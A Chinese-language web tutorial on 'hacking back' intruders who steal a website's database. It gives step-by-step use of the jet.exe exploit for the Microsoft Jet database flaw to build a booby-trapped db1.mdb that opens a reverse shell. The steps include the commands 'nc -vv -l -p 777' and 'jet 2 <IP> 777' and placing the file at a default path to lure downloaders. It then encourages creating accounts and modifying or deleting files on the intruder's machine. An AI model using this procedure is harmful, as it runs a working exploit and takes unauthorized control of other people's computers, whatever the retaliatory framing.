熱點推薦:
您现在的位置: 電腦知識網 >> 網絡技術 >> 正文

如何對付入侵者

2022-06-13   來源: 網絡技術 

  數據庫是一個網站的核心,也是入侵者入侵網站時最想得到的東西。他們會通過“暴庫”或者注入攻擊找到數據庫的路徑,從而非法下載到數據庫,並從中獲得包括管理員賬戶和密碼在內的重要信息。對於一名站長而言,數據庫被非法下載是一件極為苦惱的事。有沒有想過給那些非法下載數據庫的入侵者一個教訓呢?在本文中你將找到答案。www.sq120.com 推薦文章
反擊原理
  微軟在2004年時曾公布過一個Windows漏洞,這個漏洞的全稱為“Microsoft Jet數據庫引擎中的漏洞可能允許代碼執行”,受影響的系統幾乎包含微軟的全系列操作系統版本。入侵者可以通過這個漏洞構造惡意的數據庫文件,當沒有修補過漏洞的用戶打開這個惡意的數據庫文件時,將會執行黑客事先設置的任意代碼。
  反過來思考,如果我們將這個漏洞利用起來,把構造好的惡意數據庫文件設置為網站的數據庫,故意暴露給黑客,這樣當他們下載了數據庫並打開時,反而成了我們的肉雞。
借漏洞工具設下陷阱
  利用這個漏洞我們要借助該漏洞的溢出程序jet.exe。運行下載jet.exe,解壓到某個位置,例如“c:\”,然後點“開始→運行”,輸入“cmd”運行“命令提示符”。在“命令提示符”中運行jet.exe。
  工具的利用方法有4種:0表示在本地測試漏洞;1表示利用反向連接利用漏洞;2的功能類似“下載者”,被溢出的主機主動從指定的網址處下載可執行文件並運行,對穿透防火牆很有用;3表示從本地下載可執行文件並運行。tw.wINgWit.cOM這裡我們用第2種功能來進行測試。
監聽本地端口
  使用第2種方法,我們要監聽一個本地端口。當黑客的主機溢出後會將一個Shell發送到我們監聽的端口上。
  在“命令提示符”中運行黑客的“瑞士軍刀”nc,輸入如下命令“nc -vv -l -p 777”,回車後會顯示“listening on [any] 777 ...”。這樣就成功開始監聽本機的777端口了。
構造惡意數據庫文件
  運行“命令提示符”,輸入命令“ipconfig”,查看本機IP,假設這裡為60.176.*.*。在“命令提示符”中運行jet.exe,輸入命令“jet 2 60.176. *.* 777”,如果顯示“Malformed db1.mdb file created. Now open with MSAccess.”,則表示命令執行成功。在同目錄下會生成db1.mdb文件,這就是我們所需要的“惡意”數據庫文件了。
  提示:很多使用ADSL上網的用戶輸入命令“ipconfig”後會出現兩個IP地址,其中一個IP地址顯示“192.168.0.1”。這個IP地址其實是內網的IP地址,屬於一個保留的IP地址,外網訪問不了這個地址,因此我們在測試時需要使用類似上文中的IP地址。
故意暴露數據庫路徑
  目前黑客對下載網站數據庫的途徑很多,但最常用的伎倆就是使用網站程序的默認數據庫路徑,將路徑加在網站域名後進行猜測。
  例如:生成一個mdb文件,然後放到該目錄下。入侵者一般都會先使用默認路徑來下載數據庫,而一旦下載到數據庫,就會被勝利沖昏頭腦,很少會去判斷數據庫的真偽。而在他嘲諷該網站站長安全意識低下的同時,自己的電腦已經成為了別人的肉雞。
等入侵者自投羅網
  接下來的工作就是等待倒霉的入侵者來下載我們的數據庫並運行了。當“惡意”數據庫被打開時,對於入侵者來說,就等於打開了一個潘多拉盒子。返回查看nc監聽的窗口,可以發現監聽中的窗口已經有了反映,按一下“Enter”鍵,即可得到一個來自入侵者主機的Shell。
  由於對這個漏洞溢出後,我們默認得到的是最高權限,因此我們可以在入侵者的主機上建立賬戶,修改、刪除任意文件。給入侵者一個沉痛的教訓,讓他偷雞不成蝕把米。當然不能玩得過火,否則我們就是入侵者了。

 
From:http://tw.wingwit.com/Article/Network/201309/967.html
  • 上一篇文章:

  • 下一篇文章:
  • 推薦文章
    Copyright © 2005-2022 電腦知識網 Computer Knowledge   All rights reserved.